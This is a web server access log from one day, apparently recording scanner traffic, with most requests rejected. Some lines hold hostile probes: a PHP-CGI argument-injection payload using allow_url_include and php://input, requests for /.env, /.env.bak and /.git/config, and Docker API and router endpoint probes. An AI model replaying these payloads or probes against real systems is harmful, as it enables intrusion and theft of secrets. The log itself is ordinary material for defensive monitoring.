5.61.209.107 - - [28/Mar/2026:09:19:05 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
74.7.243.246 - - [28/Mar/2026:10:27:54 +0200] "GET /?get=login HTTP/1.1" 401 12 "{}"
91.231.89.226 - - [28/Mar/2026:11:08:11 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
95.214.53.99 - - [28/Mar/2026:12:19:40 +0200] "GET /login.asp HTTP/1.1" 404 9 "{}"
51.89.43.80 - - [28/Mar/2026:13:03:04 +0200] "GET /wp-json/custom/v1/ HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [28/Mar/2026:13:06:57 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
185.12.59.118 - - [28/Mar/2026:13:14:58 +0200] "GET /Dr0v HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [28/Mar/2026:13:59:06 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.207.74.89 - - [28/Mar/2026:14:07:39 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
91.207.74.89 - - [28/Mar/2026:14:07:39 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
91.207.74.89 - - [28/Mar/2026:14:07:45 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
47.109.48.21 - - [28/Mar/2026:14:41:14 +0200] "GET /.env.bak HTTP/1.1" 404 9 "{}"
47.109.48.21 - - [28/Mar/2026:14:41:14 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
47.109.48.21 - - [28/Mar/2026:14:41:15 +0200] "GET /version HTTP/1.1" 404 9 "{}"
47.109.48.21 - - [28/Mar/2026:14:41:15 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
47.109.48.21 - - [28/Mar/2026:14:41:16 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
79.119.240.197 - - [28/Mar/2026:15:43:15 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 16 "{}"
79.119.240.197 - - [28/Mar/2026:15:44:08 +0200] "GET /favicon.ico HTTP/1.1" 404 16 "{}"
185.247.137.175 - - [28/Mar/2026:15:57:20 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
64.227.109.89 - - [28/Mar/2026:15:57:20 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.215.0.144 - - [28/Mar/2026:17:02:52 +0200] "GET /aaa9 HTTP/1.1" 404 9 "{}"
95.215.0.144 - - [28/Mar/2026:17:02:52 +0200] "GET /aab9 HTTP/1.1" 404 9 "{}"
79.119.240.197 - - [28/Mar/2026:18:02:07 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 16 "{}"
192.168.0.250 - - [28/Mar/2026:18:41:27 +0200] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [28/Mar/2026:18:41:27 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [28/Mar/2026:18:41:27 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [28/Mar/2026:18:41:28 +0200] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [28/Mar/2026:18:41:28 +0200] "POST / HTTP/1.1" 400 11 "{}"
35.246.182.245 - - [28/Mar/2026:18:42:25 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [28/Mar/2026:18:42:26 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
172.94.9.253 - - [28/Mar/2026:18:54:38 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
18.215.159.152 - - [28/Mar/2026:19:55:53 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
101.36.106.89 - - [28/Mar/2026:20:01:55 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
101.36.106.89 - - [28/Mar/2026:20:01:55 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [28/Mar/2026:20:10:55 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
20.64.104.11 - - [28/Mar/2026:20:41:49 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [28/Mar/2026:21:14:39 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
52.167.144.220 - - [28/Mar/2026:21:25:36 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 9 "{}"
66.132.172.197 - - [28/Mar/2026:21:51:50 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.172.197 - - [28/Mar/2026:21:51:55 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
66.132.172.197 - - [28/Mar/2026:21:55:00 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [28/Mar/2026:22:16:31 +0200] "POST /_next HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [28/Mar/2026:22:16:35 +0200] "POST /api HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [28/Mar/2026:22:16:40 +0200] "POST /_next/server HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [28/Mar/2026:22:16:44 +0200] "POST /app HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [28/Mar/2026:22:16:48 +0200] "POST /api/route HTTP/1.1" 404 9 "{}"
40.77.167.27 - - [28/Mar/2026:22:30:33 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 9 "{}"
167.94.146.50 - - [28/Mar/2026:23:05:38 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
167.94.146.50 - - [28/Mar/2026:23:05:39 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
167.94.146.50 - - [28/Mar/2026:23:05:51 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
194.50.16.253 - - [28/Mar/2026:23:57:30 +0200] "GET /Export_Log?/data/zcfg_config.json HTTP/1.1" 404 9 "{}"